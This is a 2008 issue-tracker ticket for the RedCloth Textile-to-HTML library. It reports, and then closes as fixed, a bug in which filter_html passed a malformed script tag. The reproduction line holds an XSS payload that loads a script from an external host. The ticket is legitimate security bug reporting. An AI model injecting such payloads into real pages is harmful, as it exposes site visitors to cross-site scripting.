filter_html lets through malformed tags
Reported by Jason Garber | July 17th, 2008 @ 10:37 AM | in 4.0
RedCloth.new("<script src=http://ha.ckers.org/xss.js></script", [:filter_html]).to_html
Comes out unfiltered as: "<script src=http://ha.ckers.org/xss.js></script"
A security liability since a browser would handle the malformed script tag.
Comments and changes to this ticket
-
Jason Garber July 17th, 2008 @ 01:48 PM
- State changed from “new” to “resolved”
(from [4c4b52c999107e8a8f76dcd36722b02b8184cbde]) Fix filter_html letting through malformed script tag. [#15 state:resolved]
Please Sign in or create a free account to add a new ticket.
With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.
Create new ticket
Create your profile
Help contribute to this project by taking a few moments to create your personal profile. Create your profile ยป
RedCloth is a Ruby library for converting Textile into HTML
People watching this ticket
Jason Garber
Tags
Referenced by
-
4
Segfault with links
#15 0x00007f6f38e8e6e8 in ?? () from /usr/lib/libruby1.8...